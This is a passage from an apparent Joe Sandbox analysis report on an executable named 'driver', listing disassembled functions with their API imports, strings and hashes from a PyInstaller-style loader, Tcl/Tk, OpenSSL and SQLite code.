Tcl_EvalEx, xrefs: 00007FF6A29B7BB1, 00007FF6A29B7BD3
Tcl_Free, xrefs: 00007FF6A29B7C3B, 00007FF6A29B7C5D
Tcl_FindExecutable, xrefs: 00007FF6A29B7736, 00007FF6A29B7758
Tcl_ThreadAlert, xrefs: 00007FF6A29B79E5, 00007FF6A29B7A07
Tk_GetNumMainWindows, xrefs: 00007FF6A29B7C97, 00007FF6A29B7CB9
Tcl_Finalize, xrefs: 00007FF6A29B778F, 00007FF6A29B77B1
Tcl_EvalFile, xrefs: 00007FF6A29B7B83, 00007FF6A29B7BA5
Tcl_MutexUnlock, xrefs: 00007FF6A29B78D1, 00007FF6A29B78F3
Tcl_FinalizeThread, xrefs: 00007FF6A29B77BD, 00007FF6A29B77DF
Tcl_NewStringObj, xrefs: 00007FF6A29B7ACB, 00007FF6A29B7AED
Tcl_NewByteArrayObj, xrefs: 00007FF6A29B7AF9, 00007FF6A29B7B1B
Tcl_CreateInterp, xrefs: 00007FF6A29B770B, 00007FF6A29B772D
Tcl_GetVar2, xrefs: 00007FF6A29B7A13, 00007FF6A29B7A35
Tcl_Alloc, xrefs: 00007FF6A29B7C0D, 00007FF6A29B7C2F
Tcl_Init, xrefs: 00007FF6A29B76C0, 00007FF6A29B76DF
Tcl_ConditionWait, xrefs: 00007FF6A29B7989, 00007FF6A29B79AB
Tcl_CreateThread, xrefs: 00007FF6A29B7819, 00007FF6A29B783B
Tcl_MutexFinalize, xrefs: 00007FF6A29B78FF, 00007FF6A29B7921
Tcl_CreateObjCommand, xrefs: 00007FF6A29B7A6F, 00007FF6A29B7A91
GetProcAddress, xrefs: 00007FF6A29B76EF
Tcl_EvalObjv, xrefs: 00007FF6A29B7BDF, 00007FF6A29B7C01
Tcl_GetString, xrefs: 00007FF6A29B7A9D, 00007FF6A29B7ABF
Tcl_SetVar2Ex, xrefs: 00007FF6A29B7B27, 00007FF6A29B7B49
Tk_Init, xrefs: 00007FF6A29B7C69, 00007FF6A29B7C8B
Failed to get address for %hs, xrefs: 00007FF6A29B76E8
Tcl_SetVar2, xrefs: 00007FF6A29B7A41, 00007FF6A29B7A63
Tcl_ThreadQueueEvent, xrefs: 00007FF6A29B79B7, 00007FF6A29B79D9
Tcl_DoOneEvent, xrefs: 00007FF6A29B7761, 00007FF6A29B7783
Tcl_ConditionFinalize, xrefs: 00007FF6A29B792D, 00007FF6A29B794F
Tcl_MutexLock, xrefs: 00007FF6A29B78A3, 00007FF6A29B78C5

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 616c99a6fb8ce4113730a897815d4c5eee867979b0081abeb44ab7417fc0096e
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: FE02B321ACFB07D1FA549B67E8605B422A1BF08F5DF850135D41E822A7EFBCF148B260

Function 00007FF6A29B81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6A29B88A7,?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B821C

Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

\, xrefs: 00007FF6A29B8251
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6A29B82C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6A29B81F3
%.*s, xrefs: 00007FF6A29B82FC
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6A29B828D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6A29B8230
CreateDirectory, xrefs: 00007FF6A29B836C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6A29B8363

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: c5dae3934ef6882ee404ad6c9267fd937729bb3f5562b0bdf3f77c849e5be53d
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: CE51B611E9F64281FB509B23E8512BA6291FF98F8CF444031DA0EC66D7EEBCE505A750

Function 00007FF6A29B1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

fwrite, xrefs: 00007FF6A29B17D1
fread, xrefs: 00007FF6A29B17E6
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6A29B1742
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B16DA
Failed to create symbolic link %s!, xrefs: 00007FF6A29B1622
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6A29B17CA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B17DF
malloc, xrefs: 00007FF6A29B1749
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B16A2
Failed to extract %s: failed to open target file!, xrefs: 00007FF6A29B165C
fopen, xrefs: 00007FF6A29B1663
fseek, xrefs: 00007FF6A29B16E1

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: cf25af0a676f0320bbeb8c6e09f6f45fcd74eb2065ef69918a422b85099bb7eb
Instruction ID: d47d60451200b6bfc848e0532d6d9e2ab77ffb955b8ce996f5f3577a18d1f497
Opcode Fuzzy Hash: cf25af0a676f0320bbeb8c6e09f6f45fcd74eb2065ef69918a422b85099bb7eb
Instruction Fuzzy Hash: B8519A21B8A64692FA10AB63E4601A963A1BF44F9CF444131EE0C87B97DFBCF555B740

Function 00007FF8A8055880 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A80558B8
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A80558E9

Strings

SUITEB128, xrefs: 00007FF8A805590F
SUITEB192, xrefs: 00007FF8A805593D
..\s\ssl\ssl_ciph.c, xrefs: 00007FF8A8055995
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FF8A80559D1
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FF8A80559F4
SUITEB128ONLY, xrefs: 00007FF8A80558A6
check_suiteb_cipher_list, xrefs: 00007FF8A8055989
SUITEB128C2, xrefs: 00007FF8A80558DC
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FF8A80559D8, 00007FF8A80559E8

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
API String ID: 800424832-1099454403
Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction ID: 8dd8ffdc8982c1016f32c84bc3cec5960191dd59818e3f743e2c58fd02ceb0d5
Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction Fuzzy Hash: 00419E72B1AA06A6EF148B10E85037927A0EB48BD0F009535EA0EC36D5DF3CE570CB38

Function 00007FF8A868B150 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A868B253
00007FF8B9F73010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A868B334

Strings

%02x, xrefs: 00007FF8A868B554
%lld, xrefs: 00007FF8A868B3F1
%!.15g, xrefs: 00007FF8A868B40E
'%.*q', xrefs: 00007FF8A868B4A5
-- , xrefs: 00007FF8A868B1E3, 00007FF8A868B202
NULL, xrefs: 00007FF8A868B3BD
zeroblob(%d), xrefs: 00007FF8A868B4F0
?, xrefs: 00007FF8A868B348

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 22509725-875588658
Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction ID: 931ede164fa2cecd136c297b2d468988791fc84620fbd58f4b9a08e3e58e035b
Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction Fuzzy Hash: 01E1C332F0A542AAFB21CF64D4583BD27A0EB047C8F446131DE0E66A99EF3CE445C369

Function 00007FF8A8041A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A80832B6
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A80832D7
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A80832F8
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A8083319
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A8083336
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A8083353
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A8083370
00007FF8A8114D31.LIBCRYPTO-3 ref: 00007FF8A808338D

Strings

ssl_srp_ctx_init_intern, xrefs: 00007FF8A808342D
..\s\ssl\tls_srp.c, xrefs: 00007FF8A80833C3, 00007FF8A8083402, 00007FF8A8083436, 00007FF8A8083454, 00007FF8A808346D

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007A8114
String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
API String ID: 64304817-1794268454
Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction ID: 66c60d268a07a7cd7caf2fa375ee258c9a064f02842e60a9d26d8ea9701bda04
Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction Fuzzy Hash: B6919F22A0BB82A5FF85DB25D4517B87390EF85B88F184635DE5C0B296DF38E1F18724

Function 00007FF6A29B2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6A29B21AB
SelectObject.GDI32 ref: 00007FF6A29B21F2
DrawTextW.USER32 ref: 00007FF6A29B2215
SelectObject.GDI32 ref: 00007FF6A29B222B
ReleaseDC.USER32 ref: 00007FF6A29B223B
MoveWindow.USER32 ref: 00007FF6A29B228B
MoveWindow.USER32 ref: 00007FF6A29B22CB
MoveWindow.USER32 ref: 00007FF6A29B231E
MoveWindow.USER32 ref: 00007FF6A29B2366

Strings

P%, xrefs: 00007FF6A29B21FF

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: f841521467dec36c14412b2d2a1a9119f7ad6c047c0435c8b8533868c6e05486
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FA511826608BA186E6349F22E4181BAB7A1F798B65F004135EFDE83795DF7CD045EB10

Function 00007FF6A29B80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6A29B80EF
GetWindowLongPtrW.USER32 ref: 00007FF6A29B816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6A29B8182
GetLastError.KERNEL32 ref: 00007FF6A29B818C
SetWindowLongPtrW.USER32 ref: 00007FF6A29B81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF6A29B8175

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 38752fc627e6edc8395127885aa685957748e0d74624daf422a93771f6423d40
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: B621A621B8BA4282F7418B7BE8541796291FF88F98F484230DA2DC33D7DEACD591A201

Function 00007FF8A7F82940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8A7F82968
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8A7F829BA
_RTC_Initialize.LIBCMT ref: 00007FF8A7F829E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8A7F82A0E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8A7F82A39

Memory Dump Source

Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true

Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction ID: 933bb68ffdd329a82d6b908a3450475b30e92d7ac5716bf7e18fac5aebf1c50c
Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction Fuzzy Hash: 60818B20E0E243A6FA64AF759851A7D6290EFA6BD0F444135DA4C473A6DE3CFB45A308

Function 00007FF6A29C6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C69CC

Strings

f, xrefs: 00007FF6A29C6465
p, xrefs: 00007FF6A29C646D
p, xrefs: 00007FF6A29C63F5
:, xrefs: 00007FF6A29C64FC
-, xrefs: 00007FF6A29C63D9

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: fc8b5457179fdd74707a3b8e843e8010869bf4c9dd6420c2b9716348524b74b9
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: EB12C472E4E2438EFB286E16D1142797691FBC0F58F944535E68A876C6DFBCF580AB00

Function 00007FF6A29C1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C16DF

Strings

f, xrefs: 00007FF6A29C117A
p, xrefs: 00007FF6A29C111D
f, xrefs: 00007FF6A29C12C5
p, xrefs: 00007FF6A29C1182
f, xrefs: 00007FF6A29C1110

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 1d78862ce419e4756329445e5822a1960ec0c69b870c19dc54f8a04e6809298d
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 30129631E4E1438AFB24AA16E1546797261FB40F5CF984035D699C7AC6DFBCFC80AB18

Function 00007FF8A86B2100 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86B219A

Strings

table, xrefs: 00007FF8A86B2235
view, xrefs: 00007FF8A86B222E, 00007FF8A86B2344
sqlite_temp_master, xrefs: 00007FF8A86B2159, 00007FF8A86B225D
temporary table name must be unqualified, xrefs: 00007FF8A86B21CE
there is already an index named %s, xrefs: 00007FF8A86B23AE
sqlite_master, xrefs: 00007FF8A86B211F, 00007FF8A86B2282, 00007FF8A86B25D4
%s %T already exists, xrefs: 00007FF8A86B233D

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 22509725-2846519077
Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction ID: 294f0163f4acc9e0382ea1cc06b51f0476f3325e2ae63c188695fd340fe31204
Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction Fuzzy Hash: EB02AF62A0A782AAFB14DF2194087A937E1FB85BC8F046235DE4D07795EF3CE5518728

Function 00007FF8A8660A40 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

